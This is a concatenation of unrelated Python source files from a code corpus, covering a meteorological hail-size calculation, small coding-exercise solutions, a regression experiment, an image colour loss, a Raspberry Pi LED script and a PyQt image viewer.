            3750: [0, 0, 0, 5, 10, 15, 15, 15],
            3950: [0, 0, 0, 0, 5, 10, 10, 10],
            4150: [0, 0, 0, 0, 0, 0, 5, 5],
            4400: [0, 0, 0, 0, 0, 0, 0, 0],
        }
        # Upper bounds (mm) of the original-hail-size groups (table columns).
        hail_groups = [5, 10, 20, 25, 50, 75, 100, 125]
        return (
            list(lookup_dict.keys()),
            hail_groups,
            np.array(list(lookup_dict.values())),
        )
    def check_cubes(
        self,
        ccl_temperature: Cube,
        ccl_pressure: Cube,
        temperature_on_pressure: Cube,
        wet_bulb_zero_asl: Cube,
        orography: Cube,
    ) -> None:
        """Checks the size and units of input cubes and enforces the standard coord order

        Args:
            ccl_temperature:
                Cube of cloud condensation level temperature
            ccl_pressure:
                Cube of cloud condensation level pressure
            temperature_on_pressure:
                Cube of environment temperature on pressure levels
            wet_bulb_zero_asl:
                Cube of the height of the wet bulb freezing level above sea level
            orography:
                Cube of the orography height.
        """
        # Standard working order: realization, pressure, then the y/x axes.
        coord_order = ["realization", "pressure"] + [
            temperature_on_pressure.coord(axis=axis).name() for axis in "yx"
        ]
        # Record the incoming dimension order so it can be reapplied later.
        self.final_order = [c.name() for c in wet_bulb_zero_asl.dim_coords]
        for cube in [
            ccl_temperature,
            ccl_pressure,
            temperature_on_pressure,
            wet_bulb_zero_asl,
            orography,
        ]:
            enforce_coordinate_ordering(cube, coord_order)
        # Compare single slices so spatial grids can be checked even when
        # the leading dimensions differ between cubes.
        temp_slice = next(temperature_on_pressure.slices_over("pressure"))
        try:
            wb_slice = next(wet_bulb_zero_asl.slices_over("realization"))
        except CoordinateNotFoundError:
            # Deterministic input: no realization coordinate to slice over.
            wb_slice = wet_bulb_zero_asl
        assert_spatial_coords_match([wb_slice, orography])
        assert_spatial_coords_match(
            [ccl_temperature, ccl_pressure, temp_slice, wet_bulb_zero_asl]
        )
        # Normalize units in place so later arithmetic is consistent.
        ccl_temperature.convert_units("K")
        ccl_pressure.convert_units("Pa")
        temperature_on_pressure.convert_units("K")
        wet_bulb_zero_asl.convert_units("m")
        orography.convert_units("m")
@staticmethod
def temperature_after_saturated_ascent_from_ccl(
ccl_temperature: Cube,
ccl_pressure: Cube,
pressure_at_268: Cube,
humidity_mixing_ratio_at_ccl: np.array,
) -> np.ndarray:
"""Calculates the temperature after a saturated ascent
from the cloud condensation level to the pressure of the atmosphere at 268.15K
Args:
ccl_temperature:
Cube of cloud condensation level temperature
ccl_pressure:
Cube of cloud condensation level pressure
pressure_at_268:
Cube of the pressure of the environment at 268.15K
humidity_mixing_ratio_at_ccl:
Array of humidity mixing ratio at the pressure of the environment at the CCL
Returns:
Cube of temperature after the saturated ascent
"""
t_dry = dry_adiabatic_temperature(
ccl_temperature.data, ccl_pressure.data, pressure_at_268.data
)
t_2, _ = adjust_for_latent_heat(
t_dry, humidity_mixing_ratio_at_ccl, pressure_at_268.data
)
return t_2
@staticmethod
def dry_adiabatic_descent_to_ccl(
ccl_pressure: Cube, temperature_at_268: Cube, pressure_at_268: Cube
) -> np.ndarray:
"""Calculates the temperature due to a dry adiabatic descent from the
pressure of the environment at 268.15K to the cloud condensation level
pressure.
Args:
ccl_pressure:
Cube of cloud condensation level pressure
temperature_at_268:
Cube of the temperature of the environment at 268.15K
pressure_at_268:
Cube of the pressure of the environment at 268.15K
Returns:
Cube of temperature after the dry adiabatic descent
"""
t_dry = dry_adiabatic_temperature(
temperature_at_268.data, pressure_at_268.data, ccl_pressure.data
)
return t_dry
    def get_hail_size(
        self, vertical: np.ndarray, horizontal: np.ndarray, wet_bulb_zero: np.ndarray
    ) -> np.ndarray:
        """Uses the lookup_table and the vertical and horizontal indexes calculated
        to extract and store values from the lookup nomogram.

        The hail size will be set to 0 if

        1) there are masked data points,
        2) vertical or horizontal values are negative,
        3) the wet bulb freezing altitude is greater that 4400m.

        If the wet bulb freezing altitude is greater that 3300m then the hail_size is reduced.

        Args:
            vertical:
                An n dimensional array containing the values used to calculate the vertical indexes
            horizontal:
                An n dimensional array containing the values used to calculate the horizontal
                indexes
            wet_bulb_zero:
                An n dimensional array containing the height of the wet bulb freezing level

        Returns:
            an n dimension array of values for the diameter of hail (mm)
        """
        lookup_table = self.nomogram_values()
        # Rounds the calculated horizontal value to the nearest 5 which is
        # then turned into a relevant index for accessing the appropriate column.
        # Rounds the calculated vertical values to the nearest 0.5 which is then
        # turned into a relevant index for accessing the appropriate row.
        horizontal_rounded = np.around(horizontal / 5, decimals=0) - 1
        vertical_rounded = np.around(vertical * 2, decimals=0)
        # clips index values to not be longer than the table
        vertical_clipped = np.clip(vertical_rounded, None, len(lookup_table) - 1)
        horizontal_clipped = np.clip(horizontal_rounded, None, len(lookup_table[0]) - 1)
        # Zero out (and unmask) any point where either index is negative or
        # masked; index [0, 0] of the table holds hail size 0.
        vertical_clipped = np.ma.where(
            (vertical_rounded >= 0) & (horizontal_rounded >= 0), vertical_clipped, 0
        ).filled(0)
        horizontal_clipped = np.ma.where(
            (vertical_rounded >= 0) & (horizontal_rounded >= 0), horizontal_clipped, 0
        ).filled(0)
        hail_size = lookup_table[
            vertical_clipped.astype(int), horizontal_clipped.astype(int)
        ]
        # Apply the wet-bulb-freezing-height reduction only above 3300 m.
        hail_size = np.where(
            wet_bulb_zero >= 3300,
            self.updated_hail_size(hail_size, wet_bulb_zero),
            hail_size,
        )
        return hail_size
def updated_hail_size(
self, hail_size: np.array, wet_bulb_height: np.array
) -> np.array:
"""Uses the updated_nomogram values dictionary to access an updated hail size
based on the original predicted hail size and a wet bulb freezing height.
Args:
hail_size:
Integers of hail diameter value taken from the original nomogram
wet_bulb_height:
Floats of the height of the wet bulb freezing level
Returns:
An updated value for the hail diameter (mm)
"""
vectorised = np.vectorize(lambda n: bisect_right(self._wbzh_keys, n))
height_index = np.array(vectorised(wet_bulb_height) - 1).astype(int)
vectorised = np.vectorize(lambda n: bisect_right(self._hail_groups, n))
hail_index = vectorised(hail_size)
updated_hail_size = self._updated_values[height_index, hail_index]
return np.int8(updated_hail_size)
    def hail_size_data(
        self,
        temperature_at_268: Cube,
        pressure_at_268: Cube,
        ccl_pressure: Cube,
        ccl_temperature: Cube,
        humidity_mixing_ratio_at_ccl: np.array,
        wet_bulb_zero: Cube,
    ) -> np.ndarray:
        """Gets temperature of environment at 268.15K, temperature after a dry adiabatic descent
        from the pressure of air at 268.15K to ccl pressure and the temperature
        after a saturated ascent from ccl pressure to the pressure of air at 268.15K.
        From these values it calculates vertical and horizontal indices. It also masks
        data where the ccl_temperature is below 268.15K.

        Args:
            temperature_at_268:
                Cube of the temperature of the environment at 268.15K
            pressure_at_268:
                Cube of the pressure of the environment at 268.15K
            ccl_pressure:
                Cube of cloud condensation level pressure
            ccl_temperature:
                Cube of cloud condensation level temperature
            humidity_mixing_ratio_at_ccl:
                Array of humidity mixing ratio at the pressure of the environment at the CCL
            wet_bulb_zero:
                Cube of the height of the wet-bulb freezing level

        Returns:
            An n dimensional array of diameter of hail stones (m)
        """
        # temperature_at_268 is big-B in Hand (2011).
        # ccl_temperature is big-C in Hand (2011).
        # temp_dry is little-c in Hand (2011).
        temp_dry = self.dry_adiabatic_descent_to_ccl(
            ccl_pressure, temperature_at_268, pressure_at_268
        )
        # temp_saturated_ascent is little-b in Hand (2011).
        temp_saturated_ascent = self.temperature_after_saturated_ascent_from_ccl(
            ccl_temperature,
            ccl_pressure,
            pressure_at_268,
            humidity_mixing_ratio_at_ccl,
        )
        # horizontal is c - B in Hand (2011).
        horizontal = temp_dry.data - temperature_at_268.data
        # vertical is b - B in Hand (2011).
        vertical = temp_saturated_ascent.data - temperature_at_268.data
        # Mask out points where the CCL is already colder than 268.15K:
        # the nomogram does not apply there.
        temperature_mask = np.ma.masked_less(ccl_temperature.data, 268.15)
        vertical_masked = np.ma.masked_where(np.ma.getmask(temperature_mask), vertical)
        horizontal_masked = np.ma.masked_where(
            np.ma.getmask(temperature_mask), horizontal
        )
        hail_size = self.get_hail_size(
            vertical_masked, horizontal_masked, wet_bulb_zero.data
        )
        # Convert table values from millimetres to metres.
        hail_size = hail_size / 1000
        hail_size = hail_size.astype("float32")
        return hail_size
@staticmethod
def make_hail_cube(
hail_size: np.ndarray,
ccl_temperature: Cube,
ccl_pressure: Cube,
attributes: dict,
) -> Cube:
"""Puts the hail data into a cube with appropriate metadata
Args:
hail_size:
An n dimensional array of the diameter of hail stones (m)
ccl_temperature:
Cube of cloud condensation level pressure
ccl_pressure:
Cube of cloud condensation level pressure
attributes:
Dictionary of attributes for the new cube
Returns:
A cube of the diameter of hail stones (m)
"""
hail_size_cube = create_new_diagnostic_cube(
name="diameter_of_hail_stones",
units="m",
template_cube=ccl_temperature,
data=hail_size,
mandatory_attributes=generate_mandatory_attributes(
[ccl_temperature, ccl_pressure]
),
optional_attributes=attributes,
)
return hail_size_cube
    def process(
        self,
        ccl_temperature: Cube,
        ccl_pressure: Cube,
        temperature_on_pressure: Cube,
        wet_bulb_zero_height_asl: Cube,
        orography: Cube,
    ) -> Cube:
        """
        Main entry point of this class: derive a cube of hail diameter.
        Args:
            ccl_temperature:
                Cube of the cloud condensation level temperature
            ccl_pressure:
                Cube of the cloud condensation level pressure.
            temperature_on_pressure:
                Cube of temperature on pressure levels
            wet_bulb_zero_height_asl:
                Cube of the height of the wet-bulb freezing level above sea level
            orography:
                Cube of the orography height.
        Returns:
            Cube of hail diameter (m)
        """
        self.check_cubes(
            ccl_temperature,
            ccl_pressure,
            temperature_on_pressure,
            wet_bulb_zero_height_asl,
            orography,
        )
        # Locate the pressure of the 268.15 K isotherm within the profile.
        extract_pressure = ExtractPressureLevel(
            value_of_pressure_level=268.15, positive_correlation=True
        )
        pressure_at_268 = extract_pressure(temperature_on_pressure)
        # Take an arbitrary pressure slice purely as a template cube; its data
        # is overwritten below with the constant 268.15 K field.
        temperature_at_268 = next(temperature_on_pressure.slices_over(["pressure"]))
        temperature_at_268.rename("temperature_of_atmosphere_at_268.15K")
        temperature_at_268.remove_coord("pressure")
        # value_of_pressure_level here is the isotherm temperature (268.15 K),
        # so the cube is filled with that constant.
        temperature = np.full_like(
            temperature_at_268.data,
            extract_pressure.value_of_pressure_level,
            dtype=np.float32,
        )
        # Propagate the mask from the pressure extraction onto the constant field.
        temperature = np.ma.masked_where(np.ma.getmask(pressure_at_268), temperature)
        temperature_at_268.data = temperature
        attributes = {}
        if self.model_id_attr:
            attributes[self.model_id_attr] = temperature_on_pressure.attributes[
                self.model_id_attr
            ]
        # Free the (large) multi-level cube as soon as it is no longer needed.
        del temperature_on_pressure
        humidity_mixing_ratio_at_ccl = saturated_humidity(
            ccl_temperature.data, ccl_pressure.data
        )
        # Convert wet-bulb freezing height from above-sea-level to above-ground.
        wet_bulb_zero_height = wet_bulb_zero_height_asl - orography
        hail_size = self.hail_size_data(
            temperature_at_268,
            pressure_at_268,
            ccl_pressure,
            ccl_temperature,
            humidity_mixing_ratio_at_ccl,
            wet_bulb_zero_height,
        )
        hail_cube = self.make_hail_cube(
            hail_size, ccl_temperature, ccl_pressure, attributes
        )
        enforce_coordinate_ordering(hail_cube, self.final_order)
        return hail_cube
| metoppv/improver | improver/psychrometric_calculations/hail_size.py | hail_size.py | py | 21,733 | python | en | code | 95 | github-code | 90 |
18061555599 | import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
l = list(map(int, readline().split()))
l.sort()
if any([x % 2 == 0 for x in l]):
print(0)
else:
s = l[0] * l[1]
print(s)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p04005/s818956502.py | s818956502.py | py | 326 | python | en | code | 0 | github-code | 90 |
6684951024 | from collections import Counter
import re
class ConllEntry:
    """A single token row of a CoNLL-format dependency treebank."""

    def __init__(self, id, form, lemma, pos, cpos, feats=None, parent_id=None, relation=None, deps=None, misc=None):
        self.id = id
        self.form = form
        self.norm = normalize(form)
        self.cpos = cpos.upper()
        self.pos = pos.upper()
        self.parent_id = parent_id
        self.relation = relation
        self.lemma = lemma
        self.feats = feats
        self.deps = deps
        self.misc = misc
        # Filled in by the parser at prediction time.
        self.pred_parent_id = None
        self.pred_relation = None

    def __str__(self):
        """Render the entry back into a tab-separated CoNLL line ('_' for None)."""
        pred_parent = str(self.pred_parent_id) if self.pred_parent_id is not None else None
        values = [str(self.id), self.form, self.lemma, self.cpos, self.pos,
                  self.feats, pred_parent, self.pred_relation, self.deps, self.misc]
        return '\t'.join('_' if v is None else v for v in values)
def vocab(conll_path):
    """Collect vocabularies from a CoNLL file.

    Returns (word counts, word->index map, POS tag set, relation set).
    """
    wordsCount = Counter()
    posCount = Counter()
    relCount = Counter()
    with open(conll_path, 'r') as conllFP:
        for sentence in read_conll(conllFP):
            # Comment / multi-word rows are kept as raw strings by read_conll,
            # hence the isinstance filter.
            wordsCount.update([node.norm for node in sentence if isinstance(node, ConllEntry)])
            posCount.update([node.pos for node in sentence if isinstance(node, ConllEntry)])
            relCount.update([node.relation for node in sentence if isinstance(node, ConllEntry)])
    return (wordsCount, {w: i for i, w in enumerate(wordsCount.keys())}, posCount.keys(), relCount.keys())
def read_conll(fh):
    """Yield sentences from a CoNLL file handle as lists of entries.

    Each sentence is prefixed with an artificial root entry.  Comment lines
    and multi-word/empty-node rows (ids containing '-' or '.') are appended
    as raw strings rather than ConllEntry objects.
    NOTE: the very same root object is shared by every yielded sentence.
    """
    root = ConllEntry(0, '*root*', '*root*', 'ROOT-POS', 'ROOT-CPOS', '_', -1, 'rroot', '_', '_')
    tokens = [root]
    for line in fh:
        tok = line.strip().split('\t')
        if not tok or line.strip() == '':
            # Blank line ends a sentence; yield only non-empty ones.
            if len(tokens)>1: yield tokens
            tokens = [root]
        else:
            if line[0] == '#' or '-' in tok[0] or '.' in tok[0]:
                tokens.append(line.strip())
            else:
                tokens.append(ConllEntry(int(tok[0]), tok[1], tok[2], tok[4], tok[3], tok[5], int(tok[6]) if tok[6] != '_' else -1, tok[7], tok[8], tok[9]))
    if len(tokens) > 1:
        # Flush the final sentence if the file lacks a trailing blank line.
        yield tokens
def write_conll(fn, conll_gen):
    """Write sentences to *fn* in CoNLL format.

    The artificial root (element 0 of each sentence) is skipped and sentences
    are separated by a blank line.
    """
    with open(fn, 'w') as out:
        for sentence in conll_gen:
            rows = [str(entry) + '\n' for entry in sentence[1:]]
            out.writelines(rows)
            out.write('\n')
# Matches tokens that begin with digits (counts, decimals, comma-grouped
# numbers); raw string and no stray semicolon, behavior unchanged.
numberRegex = re.compile(r"[0-9]+|[0-9]+\.[0-9]+|[0-9]+[0-9,]+")


def normalize(word):
    """Map numeric-looking tokens to the sentinel 'NUM'; lowercase the rest."""
    return 'NUM' if numberRegex.match(word) else word.lower()
| elikip/bist-parser | bmstparser/src/utils.py | utils.py | py | 2,463 | python | en | code | 275 | github-code | 90 |
# Poll the outage-report grabbers forever, re-reading the config each pass.
import time
#import downdetector_graber
#import internettrafficreport_graber
import Isitdown_graber
import istheservicedown
import outage_report_grabber
import combiner_v2
import os
# NOTE(review): the config file handle is opened every iteration and never
# closed, and `while 1==1` is an unidiomatic spelling of `while True`.
while 1==1:
    conf=open(os.path.expanduser("~/FCC/senior_project/config.txt"),"r")
    conf_data=conf.readlines()
    print (conf_data)
    # Line 2 of the config holds "key:refresh-seconds".
    refresh=conf_data[1].split(":")
    print (refresh)
    refresh=refresh[1]
    # Line 1 holds "key:output-path"; [:-1] strips the trailing newline.
    path=conf_data[0].split(":")
    print (path)
    path=path[1][:-1]
    #downdetector_graber.downdetector()
    #internettrafficreport_graber.internettrafficreport()
    Isitdown_graber.isitdown()
    istheservicedown.istheservicedown()
    outage_report_grabber.outage()
    combiner_v2.combiner(path)
    print ("\nGOING TO SLEEP\n")
time.sleep(int(refresh)) | dude13498/senior_project | runner.py | runner.py | py | 794 | python | en | code | 0 | github-code | 90 |
22806764016 | """
Write a funciton that returns true if one array is a rotation of another.
example: [1, 2, 3, 4, 5, 6, 7] and [6, 7, 1, 2, 3, 4, 5]
No duplicates in these arrays.**
Solution: Find 2 indices where the arrays share a common element. Use these 2
indices loop through both arrays simultaneously and check for their similarity.
"""
def is_rotation(list1, list2):
    """Return True if *list2* is a rotation of *list1*.

    Assumes the lists contain no duplicates. Fixes the original's handling of
    two empty lists, which wrongly returned False.
    """
    if len(list1) != len(list2):  # different sizes, not a rotation
        return False
    if not list1:
        return True  # two empty lists are trivially rotations of each other
    try:
        start = list2.index(list1[0])
    except ValueError:
        return False  # list2 lacks list1's first element
    # Rotating list2 back by `start` must reproduce list1 exactly.
    return list2[start:] + list2[:start] == list1
# Ad-hoc demonstration cases for is_rotation; only the last case is printed.
list1 = [1, 2, 3, 4, 5, 6, 7]
list2a = [4, 5, 6, 7, 8, 1, 2, 3]
# is_rotation(list1, list2a) should return False.
list2b = [4, 5, 6, 7, 1, 2, 3]
# is_rotation(list1, list2b) should return True.
list2c = [4, 5, 6, 9, 1, 2, 3]
# is_rotation(list1, list2c) should return False.
list2d = [4, 6, 5, 7, 1, 2, 3]
# is_rotation(list1, list2d) should return False.
list2e = [4, 5, 6, 7, 0, 2, 3]
# is_rotation(list1, list2e) should return False.
list2f = [1, 2, 3, 4, 5, 6, 7]
# is_rotation(list1, list2f) should return True.
list2g = [6, 7, 1, 2, 3, 4, 5]
print( is_rotation(list1, list2g))
| manuel1alvarez/Python-Problems | is_rotation.py | is_rotation.py | py | 1,611 | python | en | code | 0 | github-code | 90 |
from cvzone.ClassificationModule import Classifier
import cv2

# NOTE(review): Classifier() is constructed with no model path here — confirm
# this matches the installed cvzone API before shipping.
cap = cv2.VideoCapture("Res/Spike.mp4")
myClassifier = Classifier()

while True:
    # BUG FIX: cap.read() returns a (success, frame) tuple; the original bound
    # the whole tuple to `img` and passed it to getPrediction/imshow.
    success, img = cap.read()
    if not success:
        break  # end of the video file
    prediction = myClassifier.getPrediction(img)
    cv2.imshow("Image", img)
cv2.waitKey(2) | 1Ne0Phyte1/Everything_Python | OpenCV/OpenCV Projects/Object_detection.py | Object_detection.py | py | 262 | python | en | code | 1 | github-code | 90 |
36493276805 | #Cellule d'importation des modules nécessaires à l'exécution du Notebook
import numpy as np
import pandas as pd
import sklearn as sk
from sklearn import linear_model
import urllib
import sys
# Fetch the musk data file from the project's GitHub repository.
response = urllib.request.urlopen("https://github.com/NaasCraft/projetPython2014/raw/master/clean2.data")
data = response.read() #we get a "binary literal" payload
data = data.decode('utf-8').splitlines() #hence the need for .decode('utf-8')
# Reformat the rows into a pandas DataFrame.
data2 = []
provN = ''
indexI, indexJ = 0, 1
indexTuples = []
for l in data:
    l2 = l.split(',')
    molNum = l2[1].split('_')[0]
    # Simplify the molecule identifiers: indexI numbers molecules (bags),
    # indexJ numbers conformers within a molecule.
    if provN != molNum:
        indexJ = 1
        indexI += 1
    else:
        indexJ += 1
    provN = molNum
    indexTuples += [(indexI, indexJ)]
    newLine = [indexI, indexJ] + [l2[1]] + [int(x) for x in l2[2:-1]] + [float(l2[len(l2)-1])]
    data2.append(newLine)
colNames = ['indexI', 'indexJ', 'molID'] + ['f'+str(k) for k in range(1,167)] + ['class']
multiIndex = pd.MultiIndex.from_tuples(indexTuples, names=['indexI','indexJ'])
dfMusk = pd.DataFrame(data2, columns=colNames, index=multiIndex)
# The multi-index distinguishes the "bags" of the multiple-instance problem.
## Split the data into a train set and a test set.
import random
random_list = random.sample(range(1,103), 102)
## We want 4500-5500 observations because molecules have varying conformer counts.
# NOTE(review): the loop body is deterministic (random_list is never
# re-sampled inside it), so if the first split misses the size window this
# loop never terminates; also random_list[82] appears in neither split.
num=0
while not ((4500<num) and (5500>num)):
    bag_train=random_list[0:82]
    bag_test=random_list[83:102]
    bag_train=sorted(bag_train)
    bag_test=sorted(bag_test)
    dfMusk_train=dfMusk[dfMusk["indexI"].isin(bag_train)]
    dfMusk_test=dfMusk[dfMusk["indexI"].isin(bag_test)]
    num=dfMusk_train.shape[0]
print("The training set has "+str(num)+" observations.")
#Multiple Instance Regression algorithm
#Source : Ray, Soumya; Page, David (2001). "Multiple instance regression", fig. 2
def MIRalg(R, df, list_Bag, dim, lossF):
    """Run R random restarts of the MIR EM loop and return the best weights
    and the fitted regressor.

    Args:
        R: number of random restarts.
        df: multi-indexed DataFrame of (bag, instance) rows.
        list_Bag: bag indices to iterate over.
        dim: feature dimensionality + 1 (features f1..f{dim-1} plus 'class').
        lossF: per-instance loss callback (instance_row, weights, count).
    NOTE(review): currentErr is never reset between while-loop passes, so it
    accumulates across EM iterations before being compared to bestErr.
    NOTE(review): DataFrame.ix is removed in modern pandas (use .loc).
    """
    globalErr = sys.maxsize
    count = 0
    clf=linear_model.LinearRegression()
    for r in range(R):
        # Random initial weight vector for this restart.
        b0 = np.random.randn(1, dim-1)
        bestErr = sys.maxsize
        currentErr = 0
        done = False
        while (not done):
            bestConfs = pd.DataFrame(columns=['f'+str(k) for k in range(1,dim)]+['class'])
            for i in list_Bag:
                # Pick the instance of bag i with the smallest loss under b0.
                minLoss = sys.maxsize
                nInst = df.ix[i].shape[0]
                for j in range(1,nInst+1):
                    tempErr = lossF(df.ix[(i,j)].values.tolist()[3:],b0,count)
                    if (tempErr < minLoss):
                        minLoss = tempErr
                        selectedJ = j
                currentErr += minLoss
                bestConfs.loc[i] = df.ix[(i,selectedJ)].values.tolist()[3:]
            if currentErr >= bestErr:
                done = True
            else:
                bestErr = currentErr
                b1 = b0
                last_clf=clf
                # Refit a multiple regression on the selected conformers.
                clf = linear_model.LinearRegression()
                clf.fit(bestConfs[['f'+str(k) for k in range(1,dim)]].values,bestConfs['class'].values)
                b0 = clf.coef_
        if bestErr < globalErr:
            globalErr = bestErr
            b2 = b1
    return b2, last_clf
def leastSquaresLoss(l,b,count):
    """Squared residual of one instance under weight vector *b*.

    The last element of *l* is the target; the rest are features. *count* is
    unused but kept for the lossF callback signature expected by MIRalg.
    """
    target = l[-1]
    features = np.array(l[:-1])
    residual = target - features.dot(b.T)
    return residual ** 2
# Train the MIR model and evaluate it on the held-out test bags.
b, clf = MIRalg(10, dfMusk_train, bag_train, 167, leastSquaresLoss)
##Number of good predictions on the test data set:
## We are going to use the 0-1 loss function here:
dfMusk_test["Prediction"]=clf.predict(dfMusk_test[['f'+str(k) for k in range(1,167)]].values)
#here we need to change dfMusk_test["Prediction"]
# NOTE(review): number_good_pred is never defined anywhere in this file, so
# the next line raises NameError at runtime.
print("We have "+str(number_good_pred)+" good predictions of the "+str(dfMusk_test.shape[0])+" observation of the test data set.")
print(dfMusk_test["Prediction"])
##standard output printing
# The coefficients
print('Coefficients: \n', clf.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
      % np.mean((clf.predict(dfMusk_train[['f'+str(k) for k in range(1,167)]].values) - dfMusk_train['class'].values) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % clf.score(dfMusk_train[['f'+str(k) for k in range(1,167)]].values, dfMusk_train['class'].values))
| NaasCraft/projetPython2014 | wholeCode.py | wholeCode.py | py | 4,789 | python | en | code | 0 | github-code | 90 |
18850624058 | '''
Analysis
1.input คือ การนำข้อมูลเข้าทางแป้นพิมพ์ โดยป้อนตัวเลขเข้าเรื่อยๆ จนกว่าจะเจอ -1 ถึงหยุดรับข้อมูล
2.process คือ เป็นการนำข้อมูลทั้งหมด มาหาค่าเฉลี่ยโดยไม่รวม -1
3.output คือ การแสดงผลของค่าเฉลี่ย
4.Define a Variable คือการกำหนดตัวแปร ในแต่ละข้อมูลเพื่อรับค่าและแสดงผลของค่านั้น
'''
sum = 0.0
n = 0
number = int(input("Enter number :"))
while number > -1:
sum = sum + number
n = n + 1
number = int(input("Enter number :"))
avg = sum / n
print("Avg =", avg) | Jangtiplada/Jang | Homework9.py | Homework9.py | py | 919 | python | th | code | 0 | github-code | 90 |
10419424155 | import torch
import torch.nn as nn
from skimage import io, color
import numpy as np
from dataTools.dataNormalization import *
unNorm = UnNormalize()
class deltaEColorLoss(nn.Module):
    """CIEDE2000 colour-difference loss between generated and ground-truth images.

    Args:
        normalize: if truthy, divide the per-pair delta-E by 255.0.
    """
    def __init__(self, normalize=None):
        super(deltaEColorLoss, self).__init__()
        self.loss = []
        self.normalize = normalize
        self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')

    def torchTensorToNumpy(self, image):
        """Un-normalize a CHW tensor and return it as an HWC numpy array."""
        imageNP = unNorm(image).permute(1,2,0).cpu().detach().numpy()
        return imageNP

    def __call__(self, genImage, gtImage):
        # BUG FIX: reset the per-pair losses on every call. Previously
        # self.loss kept growing across calls, so each new batch's mean was
        # diluted by every earlier batch.
        self.loss = []
        for pair in range(len(genImage)):
            # Convert tensors to HWC numpy images for skimage.
            imageGTNP = self.torchTensorToNumpy(gtImage[pair])
            imageGenNP = self.torchTensorToNumpy(genImage[pair])
            # Per-pixel CIEDE2000 difference in Lab space.
            deltaE = np.absolute(color.deltaE_ciede2000(color.rgb2lab(imageGTNP), color.rgb2lab(imageGenNP)))
            if self.normalize:
                deltaE /= 255.0
            # Mean difference for this image pair.
            self.loss.append(np.mean(deltaE))
        # NOTE: the numpy round-trip detaches from autograd; requires_grad
        # here does not propagate gradients back to the generator.
        deltaELoss = torch.mean(torch.tensor(self.loss, requires_grad=True)).to(self.device)
        return deltaELoss
| sharif-apu/BJDD_CVPR21 | loss/colorLoss.py | colorLoss.py | py | 1,372 | python | en | code | 59 | github-code | 90 |
#!/usr/bin/env python3
# Homework from Paul McWhorter YouTube video lesson 9
# Two push buttons step an LED's PWM duty cycle up/down in 12.5% increments.
import RPi.GPIO as GPIO
from time import sleep
GPIO.setmode(GPIO.BOARD)
button_up = 36
button_down = 40
led_pin = 38
# The below uses the built-in pullup/pulldown resistors on the Pi
GPIO.setup(button_up, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(button_down, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(led_pin, GPIO.OUT)
# set up the frequency (how many cycles per second)
myPWM = GPIO.PWM(led_pin, 100)
try:
    duty_cycle = 0
    myPWM.start(duty_cycle)
    while True:
        read_up = GPIO.input(button_up)
        if read_up == 1 and duty_cycle < 100:
            duty_cycle += 12.5
            myPWM.ChangeDutyCycle(duty_cycle)
            # Crude debounce: ignore further presses for half a second.
            sleep(0.5)
        read_down = GPIO.input(button_down)
        if read_down == 1 and duty_cycle > 0:
            duty_cycle -= 12.5
            myPWM.ChangeDutyCycle(duty_cycle)
            sleep(0.5)
except KeyboardInterrupt:
    # Ctrl-C releases the GPIO pins cleanly.
    GPIO.cleanup()
    print("\nCleaning up....")
| dmr-git/py | rpi/gpio_pwm.py | gpio_pwm.py | py | 1,022 | python | en | code | 0 | github-code | 90 |
13386392089 | #!/bin/python
#
# Author : Ye Jinchang
# Date : 2015-05-19 15:42:23
# Title : 29 divide two integers
# Divide two integers without using multiplication, division and mod operator.
#
# If it is overflow, return MAX_INT.
class Solution(object):
    MAX_INT = (1 << 31) - 1

    def divide(self, dividend, divisor):
        """Integer division truncating toward zero, without *, / or %.

        :type dividend: int
        :type divisor: int
        :rtype: int
        """
        negative = (dividend < 0) != (divisor < 0)
        remaining, denom = abs(dividend), abs(divisor)
        quotient = 0
        # Repeatedly subtract doubling multiples of the divisor.
        while remaining >= denom:
            chunk, multiple = denom, 1
            while remaining >= chunk:
                remaining -= chunk
                quotient += multiple
                chunk += chunk
                multiple += multiple
        if negative:
            quotient = -quotient
        # Clamp positive 32-bit overflow (e.g. INT_MIN / -1).
        if quotient > Solution.MAX_INT:
            return Solution.MAX_INT
        return quotient
| Alwayswithme/LeetCode | Python/029-divide-two-integers.py | 029-divide-two-integers.py | py | 904 | python | en | code | 1 | github-code | 90 |
14293597280 | # from PyQt5 import QtWidgets, QtGui, QtCore
# from PyQt5.QtGui import QWheelEvent
# from PyQt5.QtWidgets import QWidget
# from PyQt5.QtCore import Qt, QEvent
from PIL import Image
from base_objs.b_obj import BWindowWorker, BAreaWorker, BFigureWorker, BArea, BLayer
from b_mat.b_mat_worker import generate_mat_from_image
from base_objs.nb_platform import BPlatform
from PyQt5.QtGui import QFont, QPixmap, QMouseEvent, QImage, QWheelEvent
from ui.des import *
from ui.des_m2 import *
from ui.des_m3 import *
import sys
class ImageViewer():
    """Wraps the main window's QGraphicsView with load/zoom helpers."""
    # Multiplicative zoom step applied by zoomIn/zoomOut.
    factor = 2.0
    def __init__(self, main_window):
        self.q_graphics_view = main_window.get_self_ui().graphicsView
        self.q_graphics_view.setRenderHints(
            QtGui.QPainter.Antialiasing | QtGui.QPainter.SmoothPixmapTransform
        )
        self.q_graphics_view.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)
        self.q_graphics_view.setBackgroundRole(QtGui.QPalette.Dark)
        # One scene with a single pixmap item holds the displayed image.
        scene = QtWidgets.QGraphicsScene()
        self.q_graphics_view.setScene(scene)
        self.q_graphics_view._pixmap_item = QtWidgets.QGraphicsPixmapItem()
        scene.addItem(self.q_graphics_view._pixmap_item)
    def load_image(self, fileName):
        """Load an image into the view; return False if Qt cannot read it."""
        pixmap = QtGui.QPixmap(fileName)
        if pixmap.isNull():
            return False
        self.q_graphics_view._pixmap_item.setPixmap(pixmap)
        return True
    def zoomIn(self):
        self.zoom(self.factor)
    def zoomOut(self):
        self.zoom(1 / self.factor)
    def zoom(self, f):
        # Scale the view's transform by f in both axes.
        self.q_graphics_view.scale(f, f)
    def resetZoom(self):
        self.q_graphics_view.resetTransform()
    def fitToWindow(self):
        self.q_graphics_view.fitInView(self.q_graphics_view.sceneRect(), QtCore.Qt.KeepAspectRatio)
class BaseWin(QtWidgets.QMainWindow):
    """Main application window: opens images, builds the mat and modal tools."""
